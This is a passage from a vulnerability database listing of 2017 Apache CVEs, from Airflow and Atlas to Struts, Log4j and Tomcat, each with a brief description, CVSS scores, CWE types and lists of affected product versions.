Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache hadoop 2.7.4
apache hadoop 2.7.3
CVE-2017-15720 MEDIUM

In Apache Airflow 1.8.2 and earlier, an authenticated user can execute code remotely on the Airflow webserver by creating a special object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache airflow *
CVE-2017-17835 MEDIUM

In Apache Airflow 1.8.2 and earlier, a CSRF vulnerability allowed for a remote command injection on a default install of Airflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache airflow *
CVE-2017-17836 MEDIUM

In Apache Airflow 1.8.2 and earlier, an experimental Airflow feature displayed authenticated cookies, as well as passwords to databases used by Airflow. An attacker who has limited access to airflow, whether it be via XSS or by leaving a machine unlocked can exfiltrate all credentials from the system.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache airflow *
CVE-2017-17837 MEDIUM

The Apache DeltaSpike-JSF 1.8.0 module has a XSS injection leak in the windowId handling. The default size of the windowId get's cut off after 10 characters (by default), so the impact might be limited. A fix got applied and released in Apache deltaspike-1.8.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache deltaspike 1.8.0
CVE-2017-3150 MEDIUM

Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating use cookies that could be accessible to client-side script.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3151 MEDIUM

Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to Stored Cross-Site Scripting in the edit-tag functionality.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3152 MEDIUM

Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to DOM XSS in the edit-tag functionality.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3153 MEDIUM

Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to Reflected XSS in the search functionality.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3154 MEDIUM

Error responses from Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating included stack trace, exposing excessive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3155 MEDIUM

Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to cross frame scripting.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3156 MEDIUM

The OAuth2 Hawk and JOSE MAC Validation code in Apache CXF prior to 3.0.13 and 3.1.x prior to 3.1.10 is not using a constant time MAC signature comparison algorithm which may be exploited by sophisticated timing attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cxf 3.1.3
apache cxf 3.1.0
apache cxf 3.1.9
apache cxf *
apache cxf 3.1.4
apache cxf 3.1.8
apache cxf 3.1.5
apache cxf 3.1.6
apache cxf 3.1.2
apache cxf 3.1.1
apache cxf 3.1.7
CVE-2017-3157 MEDIUM

By exploiting the way Apache OpenOffice before 4.1.4 renders embedded objects, an attacker could craft a document that allows reading in a file from the user's filesystem. Information could be retrieved by the attacker by, e.g., using hidden sections to store the information, tricking the user into saving the document and convincing the user to send the document back to the attacker. The vulnerability is mitigated by the need for the attacker to know the precise file path in the target system, and the need to trick the user into saving the document and sending it back.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_eus 7.4
apache openoffice *
debian debian_linux 9.0
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_server_eus 7.5
redhat enterprise_linux_server_eus 7.3
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux_server 6.0
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_eus 7.6
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2017-3158 MEDIUM

A race condition in Guacamole's terminal emulator in versions 0.9.5 through 0.9.10-incubating could allow writes of blocks of printed data to overlap. Such overlapping writes could cause packet data to be misread as the packet length, resulting in the remaining data being written beyond the end of a statically-allocated buffer.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache guacamole *
apache guacamole 0.9.10-incubating
CVE-2017-3159 HIGH

Apache Camel's camel-snakeyaml component is vulnerable to Java object de-serialization vulnerability. De-serializing untrusted data can lead to security flaws.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache camel *
CVE-2017-3160 MEDIUM

After the Android platform is added to Cordova the first time, or after a project is created using the build scripts, the scripts will fetch Gradle on the first build. However, since the default URI is not using https, it is vulnerable to a MiTM and the Gradle executable is not safe. The severity of this issue is high due to the fact that the build scripts immediately start a build after Gradle has been fetched. Developers who are concerned about this issue should install version 6.1.2 or higher of Cordova-Android. If developers are unable to install the latest version, this vulnerability can easily be mitigated by setting the CORDOVA_ANDROID_GRADLE_DISTRIBUTION_URL environment variable to https://services.gradle.org/distributions/gradle-2.14.1-all.zip

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cordova *
CVE-2017-3161 MEDIUM

The HDFS web UI in Apache Hadoop before 2.7.0 is vulnerable to a cross-site scripting (XSS) attack through an unescaped query parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2017-3162 HIGH

HDFS clients interact with a servlet on the DataNode to browse the HDFS namespace. The NameNode is provided as a query parameter that is not validated in Apache Hadoop before 2.7.0.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2017-3163 MEDIUM

When using the Index Replication feature, Apache Solr nodes can pull index files from a master/leader node using an HTTP API which accepts a file name. However, Solr before 5.5.4 and 6.x before 6.4.1 did not validate the file name, hence it was possible to craft a special request involving path traversal, leaving any file readable to the Solr server process exposed. Solr servers protected and restricted by firewall rules and/or authentication would not be at risk since only trusted clients and users would gain direct HTTP access.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache solr 6.4.0
apache solr 6.2.0
apache solr 6.2.1
apache solr 6.0.0
apache solr 6.3.0
apache solr 6.0.1
apache solr 6.1.0
apache solr *
CVE-2017-3164 MEDIUM

Server Side Request Forgery in Apache Solr, versions 1.3 until 7.6 (inclusive). Since the "shards" parameter does not have a corresponding whitelist mechanism, a remote attacker with access to the server could make Solr perform an HTTP GET request to any reachable URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache solr *
CVE-2017-3165 LOW

In Apache Brooklyn before 0.10.0, the REST server is vulnerable to cross-site scripting where one authenticated user can cause scripts to run in the browser of another user authorized to access the first user's resources. This is due to improper escaping of server-side content. There is known to be a proof-of-concept exploit using this vulnerability.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache brooklyn *
CVE-2017-3166 MEDIUM

In Apache Hadoop versions 2.6.1 to 2.6.5, 2.7.0 to 2.7.3, and 3.0.0-alpha1, if a file in an encryption zone with access permissions that make it world readable is localized via YARN's localization mechanism, that file will be stored in a world-readable location and can be shared freely with any application that requests to localize that file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache hadoop 2.6.2
apache hadoop 2.6.4
apache hadoop 2.7.1
apache hadoop 2.7.0
apache hadoop 2.6.3
apache hadoop 2.6.5
apache hadoop 2.7.2
apache hadoop 2.6.1
apache hadoop 2.7.3
apache hadoop 3.0.0
CVE-2017-3167 HIGH

In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, use of the ap_get_basic_auth_pw() by third-party modules outside of the authentication phase may lead to authentication requirements being bypassed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,CWE-287,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
apache http_server *
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
redhat jboss_core_services 1.0
redhat enterprise_linux_eus 7.6
netapp clustered_data_ontap -
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server 6.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 7.4
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.2
netapp storagegrid -
oracle secure_global_desktop 5.3
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
apple mac_os_x *
netapp oncommand_unified_manager -
debian debian_linux 9.0
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_eus 6.7
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server 7.0
CVE-2017-3169 HIGH

In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_ssl may dereference a NULL pointer when third-party modules call ap_hook_process_connection() during an HTTP request to an HTTPS port.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-476,CWE-476,

Products Affected

Vendor Product Version
apache http_server 2.2.17
apache http_server 2.2.27
apache http_server 2.2.31
apache http_server 2.4.2
apache http_server 2.2.19
apache http_server 2.2.11
apache http_server 2.4.18
apache http_server 2.2.2
apache http_server 2.4.10
apache http_server 2.4.1
apache http_server 2.2.14
apache http_server 2.4.17
apache http_server 2.2.20
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.2.25
apache http_server 2.2.26
apache http_server 2.2.12
apache http_server 2.2.29
apache http_server 2.4.25
apache http_server 2.2.23
apache http_server 2.2.32
apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.4.23
apache http_server 2.4.20
apache http_server 2.4.12
apache http_server 2.4.16
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.2.22
apache http_server 2.2.3
apache http_server 2.2.30
apache http_server 2.2.24
CVE-2017-5635 MEDIUM

In Apache NiFi before 0.7.2 and 1.x before 1.1.2 in a cluster environment, if an anonymous user request is replicated to another node, the originating node identity is used rather than the "anonymous" user.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache nifi 0.7.0
apache nifi 1.1.1
apache nifi 1.1.0
apache nifi 0.7.1
CVE-2017-5636 HIGH

In Apache NiFi before 0.7.2 and 1.x before 1.1.2 in a cluster environment, the proxy chain serialization/deserialization is vulnerable to an injection attack where a carefully crafted username could impersonate another user and gain their permissions on a replicated request to another node.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache nifi 0.7.0
apache nifi 1.1.1
apache nifi 1.1.0
apache nifi 0.7.1
CVE-2017-5637 MEDIUM

Two four letter word commands "wchp/wchc" are CPU intensive and could cause spike of CPU utilization on Apache ZooKeeper server if abused, which leads to the server unable to serve legitimate client requests. Apache ZooKeeper thru version 3.4.9 and 3.5.2 suffer from this issue, fixed in 3.4.10, 3.5.3, and later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,CWE-400,

Products Affected

Vendor Product Version
apache zookeeper 3.5.1
apache zookeeper 3.4.2
apache zookeeper 3.4.6
apache zookeeper 3.4.3
apache zookeeper 3.4.5
apache zookeeper 3.5.2
debian debian_linux 8.0
apache zookeeper 3.4.7
apache zookeeper 3.5.0
apache zookeeper 3.4.1
apache zookeeper 3.4.4
apache zookeeper 3.4.0
apache zookeeper 3.4.9
apache zookeeper 3.4.8
CVE-2017-5638 HIGH

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-755,CWE-755,

Products Affected

Vendor Product Version
apache struts 2.3.20
oracle weblogic_server 10.3.6.0.0
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.3.24.3
apache struts 2.5.1
apache struts 2.5.3
apache struts 2.5.4
oracle weblogic_server 12.2.1.1.0
lenovo storage_v5030_firmware 7.7.1.6
apache struts 2.3.28.1
hp server_automation 9.1.0
apache struts 2.3.25
ibm storwize_v5000_firmware 7.7.1.6
apache struts 2.5.10
apache struts *
apache struts 2.3.15.2
ibm storwize_v5000_firmware 7.8.1.0
apache struts 2.3.16.1
apache struts 2.5.2
apache struts 2.5.6
ibm storwize_v3500_firmware 7.7.1.6
apache struts 2.3.16.3
apache struts 2.3.20.3
apache struts 2.3.27
apache struts 2.3.15.1
apache struts 2.3.23
ibm storwize_v7000_firmware 7.8.1.0
apache struts 2.3.13
apache struts 2.5.7
ibm storwize_v7000_firmware 7.7.1.6
apache struts 2.5
arubanetworks clearpass_policy_manager *
netapp oncommand_balance -
apache struts 2.3.26
apache struts 2.5.8
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.29
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.5.9
ibm storwize_v3500_firmware 7.8.1.0
lenovo storage_v5030_firmware 7.8.1.0
hp server_automation 10.2.0
apache struts 2.3.24.2
apache struts 2.3.30
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.6
oracle weblogic_server 12.2.1.2.0
hp server_automation 10.0.0
apache struts 2.3.12
hp server_automation 10.1.0
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.3.9
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.5.5
apache struts 2.3.14
apache struts 2.3.5
apache struts 2.3.24.1
hp server_automation 10.5.0
apache struts 2.3.21
apache struts 2.3.20.2
oracle weblogic_server 12.1.3.0.0
apache struts 2.3.16
CVE-2017-5640 HIGH

It was noticed that a malicious process impersonating an Impala daemon in Apache Impala (incubating) 2.7.0 to 2.8.0 could cause Impala daemons to skip authentication checks when Kerberos is enabled (but TLS is not). If the malicious server responds with 'COMPLETE' before the SASL handshake has completed, the client will consider the handshake as completed even though no exchange of credentials has happened.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache impala 2.8.0
apache impala 2.7.0
CVE-2017-5641 HIGH

Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache flex_blazeds *
hp xp_command_view_advanced_edition *
CVE-2017-5642 HIGH

During installation of Ambari 2.4.0 through 2.4.2, Ambari Server artifacts are not created with proper ACLs.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-276,

Products Affected

Vendor Product Version
apache ambari 2.4.0
apache ambari 2.4.1
apache ambari 2.4.2
CVE-2017-5643 MEDIUM

Apache Camel's Validation Component is vulnerable against SSRF via remote DTDs and XXE.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache camel 2.17.1
apache camel 2.17.3
apache camel 2.18.0
apache camel 2.17.5
apache camel 2.18.1
apache camel *
apache camel 2.17.2
apache camel 2.17.0
apache camel 2.18.2
apache camel 2.17.4
CVE-2017-5644 HIGH

Apache POI in versions prior to release 3.15 allows remote attackers to cause a denial of service (CPU consumption) via a specially crafted OOXML file, aka an XML Entity Expansion (XEE) attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-776,

Products Affected

Vendor Product Version
apache poi *
CVE-2017-5645 HIGH

In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle financial_services_hedge_management_and_ifrs_valuations 8.0.5
redhat enterprise_linux_server_aus 7.4
oracle siebel_ui_framework 18.7
oracle financial_services_regulatory_reporting_with_agilereporter 8.0.9.2.0
oracle policy_automation 12.2.0
oracle policy_automation 12.2.7
oracle soa_suite 12.2.2.0.0
oracle api_gateway 11.1.2.4.0
oracle identity_management_suite 11.1.2.3.0
oracle weblogic_server 10.3.6.0.0
oracle retail_extract_transform_and_load 13.2
oracle financial_services_profitability_management 6.1.1
redhat enterprise_linux 7.3
oracle policy_automation 12.2.9
redhat enterprise_linux 6.0
oracle retail_extract_transform_and_load 13.1
oracle insurance_rules_palette 11.1
oracle policy_automation 10.4.7
oracle financial_services_loan_loss_forecasting_and_provisioning 8.0.5
oracle policy_automation_for_mobile_devices 12.2.9
oracle insurance_policy_administration 10.1
oracle weblogic_server 12.2.1.3.0
oracle bi_publisher 12.2.1.4.0
oracle insurance_policy_administration 10.0
oracle siebel_ui_framework 18.8
oracle identity_management_suite 12.2.1.3.0
redhat enterprise_linux_server_eus 7.4
oracle retail_open_commerce_platform 6.0.1
oracle enterprise_manager_for_oracle_database 13.2.2
netapp snapcenter -
oracle retail_integration_bus 14.0.0
oracle insurance_rules_palette 10.1
oracle jdeveloper 11.1.1.9.0
oracle enterprise_manager_for_mysql_database *
oracle policy_automation 12.2.10
oracle policy_automation_for_mobile_devices 12.1.0
oracle retail_advanced_inventory_planning 14.0
oracle weblogic_server 14.1.1.0.0
oracle financial_services_hedge_management_and_ifrs_valuations 8.0.4
oracle endeca_information_discovery_studio 3.2.0
oracle retail_service_backbone 16.0
oracle banking_platform 2.6.2
oracle tape_library_acsls 8.4
redhat enterprise_linux_server 7.0
oracle retail_integration_bus 16.0
oracle instantis_enterprisetrack *
oracle financial_services_loan_loss_forecasting_and_provisioning 8.0.4
redhat enterprise_linux_server_tus 7.6
netapp service_level_manager -
oracle communications_webrtc_session_controller *
oracle banking_platform 2.6.0
apache log4j *
oracle policy_automation_for_mobile_devices 12.2.8
oracle communications_service_broker 6.0
redhat enterprise_linux 7.4
oracle peoplesoft_enterprise_fin_install 9.2
netapp oncommand_insight -
redhat fuse 1.0
oracle communications_network_integrity *
oracle utilities_advanced_spatial_and_operational_analytics 2.7.0.1
redhat enterprise_linux_server_aus 7.6
oracle jdeveloper 12.2.1.3.0
oracle policy_automation_for_mobile_devices 12.2.6
oracle bi_publisher 11.1.1.9.0
oracle enterprise_manager_for_oracle_database 12.1.0.8
oracle retail_clearance_optimization_engine 14.0.5
oracle financial_services_lending_and_leasing 12.5.0
oracle retail_predictive_application_server 15.0.3
oracle retail_open_commerce_platform 6.0.0
oracle autovue_vuelink_integration 21.0.0
oracle fusion_middleware_mapviewer 12.2.1.2
oracle retail_service_backbone 14.1
oracle retail_extract_transform_and_load 19.0
oracle communications_messaging_server *
oracle goldengate_application_adapters 12.3.2.1.1
oracle policy_automation_for_mobile_devices 10.4.7
oracle jd_edwards_enterpriseone_tools 9.2
oracle insurance_calculation_engine 10.2.1
redhat enterprise_linux 7.6
oracle policy_automation_for_mobile_devices 12.2.5
oracle rapid_planning 12.2
oracle soa_suite 12.1.3.0.0
oracle communications_online_mediation_controller 6.1
oracle policy_automation_for_mobile_devices 12.2.2
oracle configuration_manager 12.1.2.0.5
oracle financial_services_behavior_detection_platform *
oracle policy_automation_connector_for_siebel 10.4.6
oracle policy_automation_for_mobile_devices 12.2.0
oracle flexcube_investor_servicing 12.3.0
oracle primavera_gateway *
oracle flexcube_investor_servicing 12.4.0
oracle policy_automation 12.1.1
oracle enterprise_manager_for_peoplesoft 13.1.1.1
oracle jd_edwards_enterpriseone_tools 4.0.1.0
oracle in-memory_performance-driven_planning 12.2
oracle policy_automation 12.2.8
oracle policy_automation 12.2.3
redhat enterprise_linux_server_tus 7.4
oracle timesten_in-memory_database 11.2.2.8.49
netapp oncommand_api_services -
oracle insurance_rules_palette 10.2
oracle banking_platform 2.6.1
oracle enterprise_manager_for_fusion_middleware 12.1.0.5
oracle retail_extract_transform_and_load 13.0
oracle policy_automation 12.1.0
oracle identity_analytics 11.1.1.5.8
oracle policy_automation 12.2.5
oracle soa_suite 12.2.1.3.0
oracle communications_interactive_session_recorder *
oracle fusion_middleware_mapviewer 12.2.1.3
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
oracle application_testing_suite 13.3.0.1
oracle bi_publisher 12.2.1.3.0
oracle policy_automation_for_mobile_devices 12.2.3
oracle retail_advanced_inventory_planning 15.0
oracle identity_manager_connector 9.0
oracle policy_automation_for_mobile_devices 12.2.10
oracle insurance_rules_palette 10.0
oracle enterprise_manager_base_platform 13.2.0.0
redhat enterprise_linux_server_eus 7.6
oracle flexcube_investor_servicing 14.0.0
oracle insurance_rules_palette 11.0
oracle enterprise_manager_base_platform 12.1.0.5
oracle goldengate 12.3.2.1.1
oracle policy_automation 12.2.1
oracle enterprise_data_quality 12.2.1.3.0
oracle in-memory_performance-driven_planning 12.1
oracle insurance_policy_administration 11.0
netapp storage_automation_store -
oracle autovue_vuelink_integration 21.0.1
oracle financial_services_analytical_applications_infrastructure *
oracle siebel_ui_framework 18.9
oracle policy_automation 12.2.2
oracle policy_automation 12.2.6
oracle retail_open_commerce_platform 5.3.0
oracle retail_integration_bus 14.1.0
oracle retail_service_backbone 15.0
oracle rapid_planning 12.1
oracle policy_automation_for_mobile_devices 12.2.1
oracle insurance_policy_administration 10.2
oracle policy_automation 12.2.4
oracle mysql_enterprise_monitor *
oracle flexcube_investor_servicing 12.0.4
redhat enterprise_linux_desktop 7.0
oracle jdeveloper 12.1.3.0.0
oracle weblogic_server 12.2.1.4.0
oracle configuration_manager 12.1.2.0.2
oracle communications_pricing_design_center 12.0
oracle financial_services_behavior_detection_platform 6.1.1
redhat enterprise_linux_workstation 7.0
oracle policy_automation_for_mobile_devices 12.1.1
oracle financial_services_lending_and_leasing *
redhat enterprise_linux 6.7
redhat enterprise_linux_server_eus 7.5
oracle policy_automation_for_mobile_devices 12.2.4
oracle flexcube_investor_servicing 12.1.0
oracle communications_instant_messaging_server 10.0.1.3.0
oracle policy_automation_for_mobile_devices 12.2.7
oracle retail_integration_bus 15.0
oracle financial_services_profitability_management *
oracle insurance_calculation_engine 10.1.1
oracle utilities_work_and_asset_management 1.9.1.2.12
oracle communications_pricing_design_center 11.1
oracle enterprise_manager_for_fusion_middleware 13.2.0.0
oracle communications_converged_application_server_-_service_controller 6.1
oracle enterprise_manager_for_peoplesoft 13.2.1.1
oracle bi_publisher 11.1.1.7.0
netapp oncommand_workflow_automation -
oracle weblogic_server 12.1.3.0.0
CVE-2017-5646 MEDIUM

For versions of Apache Knox from 0.2.0 to 0.11.0 - an authenticated user may use a specially crafted URL to impersonate another user while accessing WebHDFS through Apache Knox. This may result in escalated privileges and unauthorized data access. While this activity is audit logged and can be easily associated with the authenticated user, this is still a serious security issue. All users are recommended to upgrade to the Apache Knox 0.12.0 release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N 1.6 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-346,

Products Affected

Vendor Product Version
apache knox 0.4.0
apache knox 0.2.0
apache knox 0.7.0
apache knox 0.10.0
apache knox 0.6.0
apache knox 0.8.0
apache knox 0.3.0
apache knox 0.5.0
apache knox 0.9.0
apache knox 0.11.0
CVE-2017-5647 MEDIUM

A bug in the handling of the pipelined requests in Apache Tomcat 9.0.0.M1 to 9.0.0.M18, 8.5.0 to 8.5.12, 8.0.0.RC1 to 8.0.42, 7.0.0 to 7.0.76, and 6.0.0 to 6.0.52, when send file was used, results in the pipelined request being lost when send file processing of the previous request completed. This could result in responses appearing to be sent for the wrong request. For example, a user agent that sent requests A, B and C could see the correct response for request A, the response for request C for request B and no response for request C.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 6.0.43
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 8.0.42
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.72
apache tomcat 6.0.50
apache tomcat 9.0.0
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 8.0.40
apache tomcat 8.5.4
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 8.5.11
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 6.0.42
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 6.0.34
apache tomcat 7.0.24
apache tomcat 8.5.7
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 8.0.32
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 6.0.52
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 6.0.24
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 6.0.3
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 6.0.51
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 6.0.7
apache tomcat 6.0.46
apache tomcat 6.0.1
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.38
apache tomcat 8.0.37
apache tomcat 6.0.8
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 8.0.23
apache tomcat 6.0.44
apache tomcat 6.0.15
apache tomcat 8.0.5
apache tomcat 8.5.8
apache tomcat 7.0.17
apache tomcat 6.0.22
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.23
apache tomcat 7.0.75
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 6.0.17
apache tomcat 8.0.34
apache tomcat 7.0.25
apache tomcat 6.0.45
apache tomcat 8.0.21
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 6.0.47
apache tomcat 6.0.25
apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 7.0.35
apache tomcat 7.0.23
